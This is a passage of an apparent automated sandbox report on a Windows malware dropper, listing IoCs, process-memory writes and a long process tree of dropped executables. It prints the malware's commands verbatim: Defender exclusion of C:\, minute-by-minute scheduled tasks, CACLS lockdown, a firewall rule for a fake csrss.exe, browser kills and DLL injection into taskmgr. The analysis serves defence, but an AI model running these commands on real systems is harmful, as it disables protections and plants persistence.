Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found
Token: SeShutdownPrivilege	2920	Process not Found
Token: SeCreatePagefilePrivilege	2920	Process not Found

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3440	wmpshare.exe
5348	ieinstal.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
3440	wmpshare.exe

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
4244	c15.exe
3124	Remc.exe
4824	WD.exe
4364	dai.exe
3672	31.exe
2748	c.exe
3324	d.exe
664	dd.exe
236	c6.exe
2880	C5.exe
3140	dcr.exe
4696	Play.exe
4676	bz.exe
2920	Process not Found
2920	Process not Found
5124	m5395202.exe
2920	Process not Found
2920	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2292 wrote to memory of 2080	2292	a.exe	67
PID 2292 wrote to memory of 2080	2292	a.exe	67
PID 2292 wrote to memory of 2080	2292	a.exe	67
PID 2292 wrote to memory of 4244	2292	a.exe	68
PID 2292 wrote to memory of 4244	2292	a.exe	68
PID 2292 wrote to memory of 4244	2292	a.exe	68
PID 4244 wrote to memory of 3968	4244	c15.exe	69
PID 4244 wrote to memory of 3968	4244	c15.exe	69
PID 4244 wrote to memory of 3968	4244	c15.exe	69
PID 4244 wrote to memory of 3968	4244	c15.exe	69
PID 4244 wrote to memory of 3968	4244	c15.exe	69
PID 2292 wrote to memory of 3124	2292	a.exe	72
PID 2292 wrote to memory of 3124	2292	a.exe	72
PID 2292 wrote to memory of 3124	2292	a.exe	72
PID 2292 wrote to memory of 4824	2292	a.exe	74
PID 2292 wrote to memory of 4824	2292	a.exe	74
PID 2292 wrote to memory of 4824	2292	a.exe	74
PID 4824 wrote to memory of 4376	4824	WD.exe	75
PID 4824 wrote to memory of 4376	4824	WD.exe	75
PID 4824 wrote to memory of 4376	4824	WD.exe	75
PID 4824 wrote to memory of 4376	4824	WD.exe	75
PID 4824 wrote to memory of 4376	4824	WD.exe	75
PID 4824 wrote to memory of 4376	4824	WD.exe	75
PID 4824 wrote to memory of 4376	4824	WD.exe	75
PID 4824 wrote to memory of 4376	4824	WD.exe	75
PID 2292 wrote to memory of 4364	2292	a.exe	76
PID 2292 wrote to memory of 4364	2292	a.exe	76
PID 2292 wrote to memory of 4364	2292	a.exe	76
PID 4364 wrote to memory of 3916	4364	dai.exe	77
PID 4364 wrote to memory of 3916	4364	dai.exe	77
PID 4364 wrote to memory of 3916	4364	dai.exe	77
PID 2292 wrote to memory of 3672	2292	a.exe	79
PID 2292 wrote to memory of 3672	2292	a.exe	79
PID 2292 wrote to memory of 3672	2292	a.exe	79
PID 3672 wrote to memory of 5040	3672	31.exe	222
PID 3672 wrote to memory of 5040	3672	31.exe	222
PID 3672 wrote to memory of 5040	3672	31.exe	222
PID 3916 wrote to memory of 5092	3916	cmd.exe	82
PID 3916 wrote to memory of 5092	3916	cmd.exe	82
PID 3916 wrote to memory of 5092	3916	cmd.exe	82
PID 2292 wrote to memory of 2748	2292	a.exe	83
PID 2292 wrote to memory of 2748	2292	a.exe	83
PID 2292 wrote to memory of 2748	2292	a.exe	83
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 2748 wrote to memory of 3440	2748	c.exe	84
PID 5040 wrote to memory of 4900	5040	cacls.exe	193
PID 5040 wrote to memory of 4900	5040	cacls.exe	193
PID 5040 wrote to memory of 4900	5040	cacls.exe	193
PID 2292 wrote to memory of 3324	2292	a.exe	86
PID 2292 wrote to memory of 3324	2292	a.exe	86
PID 2292 wrote to memory of 3324	2292	a.exe	86
PID 2292 wrote to memory of 664	2292	a.exe	97
PID 2292 wrote to memory of 664	2292	a.exe	97
PID 2292 wrote to memory of 664	2292	a.exe	97

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	sechussanzx.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	sechussanzx.exe

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2292
- C:\Users\Admin\AppData\Local\Temp\a\cleanmgr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cleanmgr.exe"
  2⤵
  - Executes dropped EXE
  PID:2080
- C:\Users\Admin\AppData\Local\Temp\a\c15.exe
  "C:\Users\Admin\AppData\Local\Temp\a\c15.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4244
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    -arguments
    3⤵
    PID:3968
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 468
    3⤵
    - Program crash
    PID:4812
- C:\Users\Admin\AppData\Local\Temp\a\Remc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Remc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:3124
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\anykafriyq.vbs"
    3⤵
    PID:5540
- C:\Users\Admin\AppData\Local\Temp\a\WD.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WD.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4824
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4376
- C:\Users\Admin\AppData\Local\Temp\a\dai.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dai.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4364
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3916
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5092
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    -arguments
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4372
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 460
    3⤵
    - Program crash
    PID:1748
- C:\Users\Admin\AppData\Local\Temp\a\31.exe
  "C:\Users\Admin\AppData\Local\Temp\a\31.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3672
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\
    3⤵
    PID:5040
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\
      4⤵
      PID:4900
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    -arguments
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4864
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\InllFKaaIb8D.bat" "
      4⤵
      PID:5236
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:5924
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        5⤵
        Runs ping.exe
        
        PID:5536
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        
        PID:2156
- C:\Users\Admin\AppData\Local\Temp\a\c.exe
  "C:\Users\Admin\AppData\Local\Temp\a\c.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2748
- - C:\Program Files (x86)\Windows Media Player\wmpshare.exe
    "C:\Program Files (x86)\Windows Media Player\wmpshare.exe"
    3⤵
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3440
- C:\Users\Admin\AppData\Local\Temp\a\d.exe
  "C:\Users\Admin\AppData\Local\Temp\a\d.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:3324
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    -arguments
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 472
    3⤵
    - Program crash
    PID:2088
- C:\Users\Admin\AppData\Local\Temp\a\c6.exe
  "C:\Users\Admin\AppData\Local\Temp\a\c6.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:236
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\
    3⤵
    PID:2044
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\
      4⤵
      PID:1816
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    -arguments
    3⤵
    PID:3368
- C:\Users\Admin\AppData\Local\Temp\a\dd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dd.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:664
- C:\Users\Admin\AppData\Local\Temp\a\C5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\C5.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:2880
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    -arguments
    3⤵
    - Accesses Microsoft Outlook profiles
    - Suspicious use of AdjustPrivilegeToken
    PID:4056
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 460
    3⤵
    - Program crash
    PID:2256
- C:\Users\Admin\AppData\Local\Temp\a\dcr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dcr.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:3140
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    -arguments
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 464
    3⤵
    - Program crash
    PID:2600
- C:\Users\Admin\AppData\Local\Temp\a\cleanmgrs.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cleanmgrs.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  PID:4780
- - C:\Users\Admin\AppData\Local\Temp\a\cleanmgrs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cleanmgrs.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:208
- C:\Users\Admin\AppData\Local\Temp\a\emmy.exe
  "C:\Users\Admin\AppData\Local\Temp\a\emmy.exe"
  2⤵
  - Executes dropped EXE
  PID:1884
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "{path}"
    3⤵
    PID:1608
- C:\Users\Admin\AppData\Local\Temp\a\sechussanzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sechussanzx.exe"
  2⤵
  - Executes dropped EXE
  PID:216
- - C:\Users\Admin\AppData\Local\Temp\a\sechussanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sechussanzx.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - outlook_office_path
    - outlook_win_path
    PID:5852
- C:\Users\Admin\AppData\Local\Temp\a\ella.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ella.exe"
  2⤵
  - Executes dropped EXE
  PID:3700
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "{path}"
    3⤵
    PID:3572
- C:\Users\Admin\AppData\Local\Temp\a\alex.exe
  "C:\Users\Admin\AppData\Local\Temp\a\alex.exe"
  2⤵
  - Executes dropped EXE
  PID:3816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\tnKxTjIeQjV.exe"
    3⤵
    PID:5576
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tnKxTjIeQjV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp50DF.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:5700
- - C:\Users\Admin\AppData\Local\Temp\a\alex.exe
    "C:\Users\Admin\AppData\Local\Temp\a\alex.exe"
    3⤵
    PID:1136
- C:\Users\Admin\AppData\Local\Temp\a\Play.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Play.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:4696
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    -arguments
    3⤵
    PID:1676
- C:\Users\Admin\AppData\Local\Temp\a\bz.exe
  "C:\Users\Admin\AppData\Local\Temp\a\bz.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4676
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Public"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2200
- - C:\Users\Public\Videos\Play.exe
    C:\Users\Public\Videos\Play.exe
    3⤵
    PID:5124
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      -arguments
      4⤵
      PID:1840
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 460
      4⤵
      Program crash
      PID:2524
- C:\Users\Admin\AppData\Local\Temp\a\cleanpc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cleanpc.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:3364
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cleanpc.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:5348
- C:\Users\Admin\AppData\Local\Temp\a\s.exe
  "C:\Users\Admin\AppData\Local\Temp\a\s.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:5288
- C:\Users\Admin\AppData\Local\Temp\a\photo912.exe
  "C:\Users\Admin\AppData\Local\Temp\a\photo912.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:5480
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v6674595.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v6674595.exe
    3⤵
    PID:5556
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2319358.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2319358.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:5616
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9099346.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\v9099346.exe
        5⤵
        
        PID:5672
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a5848190.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\a5848190.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5740
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b8758941.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\b8758941.exe
        6⤵
        Executes dropped EXE
        
        PID:5796
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c7256053.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\c7256053.exe
        5⤵
        
        PID:6072
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d0324368.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\d0324368.exe
      4⤵
      PID:608
    - - C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe"
        5⤵
        
        PID:5568
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe" /F
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Creates scheduled task(s)
        
        PID:5672
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "lamod.exe" /P "Admin:N"&&CACLS "lamod.exe" /P "Admin:R" /E&&echo Y|CACLS "..\a9e2a16078" /P "Admin:N"&&CACLS "..\a9e2a16078" /P "Admin:R" /E&&Exit
        6⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:2184
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "lamod.exe" /P "Admin:N"
        7⤵
        
        PID:5832
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "lamod.exe" /P "Admin:R" /E
        7⤵
        
        PID:608
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:5936
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\a9e2a16078" /P "Admin:N"
        7⤵
        
        PID:2072
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\a9e2a16078" /P "Admin:R" /E
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5040
      - C:\Users\Admin\AppData\Local\Temp\1000007051\foto164.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000007051\foto164.exe"
        6⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x9047029.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x9047029.exe
        7⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\x5271176.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\x5271176.exe
        8⤵
        
        PID:4724
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\f0699091.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\f0699091.exe
        9⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\g7031948.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\g7031948.exe
        9⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\h8193536.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\h8193536.exe
        8⤵
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\i2515424.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\i2515424.exe
        7⤵
        
        PID:5136
      - C:\Users\Admin\AppData\Local\Temp\1000008051\fotod75.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000008051\fotod75.exe"
        6⤵
        
        PID:5592
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y4760738.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y4760738.exe
        7⤵
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\y4369071.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\y4369071.exe
        8⤵
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\y6055727.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\y6055727.exe
        9⤵
        
        PID:1100
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\k1638398.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\k1638398.exe
        10⤵
        
        PID:328
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\l6669558.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\l6669558.exe
        9⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\m5395202.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\m5395202.exe
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of SetWindowsHookEx
        
        PID:5124
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\n9850450.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\n9850450.exe
        7⤵
        
        PID:4880
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        6⤵
        
        PID:5696
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e3248715.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\e3248715.exe
    3⤵
    PID:5680
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1816
- C:\Users\Admin\AppData\Local\Temp\a\ai%E8%BF%9B%E7%A8%8B%E5%AE%88%E6%8A%A4.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ai%E8%BF%9B%E7%A8%8B%E5%AE%88%E6%8A%A4.exe"
  2⤵
  - Executes dropped EXE
  PID:5248
- C:\Users\Admin\AppData\Local\Temp\a\obins.exe
  "C:\Users\Admin\AppData\Local\Temp\a\obins.exe"
  2⤵
  - Executes dropped EXE
  PID:5704
- - C:\Users\Admin\AppData\Local\Temp\ss41.exe
    "C:\Users\Admin\AppData\Local\Temp\ss41.exe"
    3⤵
    - Executes dropped EXE
    PID:2148
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /IM msedge.exe /F
      4⤵
      Kills process with taskkill
      PID:6024
  - - C:\Windows\SYSTEM32\taskkill.exe
      taskkill /IM chrome.exe /F
      4⤵
      Kills process with taskkill
      PID:1316
- - C:\Users\Admin\AppData\Local\Temp\2a344302.exe
    "C:\Users\Admin\AppData\Local\Temp\2a344302.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:5216
- - C:\Users\Admin\AppData\Local\Temp\newplayer.exe
    "C:\Users\Admin\AppData\Local\Temp\newplayer.exe"
    3⤵
    PID:5348
  - - C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
      "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
      4⤵
      Executes dropped EXE
      PID:3996
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:4408
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
        5⤵
        
        PID:5948
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:4296
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:N"
        6⤵
        
        PID:1196
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "oneetx.exe" /P "Admin:R" /E
        6⤵
        
        PID:3904
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:5912
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:N"
        6⤵
        
        PID:5328
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\207aa4515d" /P "Admin:R" /E
        6⤵
        
        PID:5820
    - - C:\Users\Admin\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe"
        5⤵
        
        PID:3724
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5564
      - C:\Users\Admin\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe"
        6⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:5924
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:2860
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:5780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:5776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:5164
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        7⤵
        
        PID:4436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:5372
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        8⤵
        Creates scheduled task(s)
        
        PID:5560
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        8⤵
        
        PID:4668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:5564
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        8⤵
        
        PID:5496
        
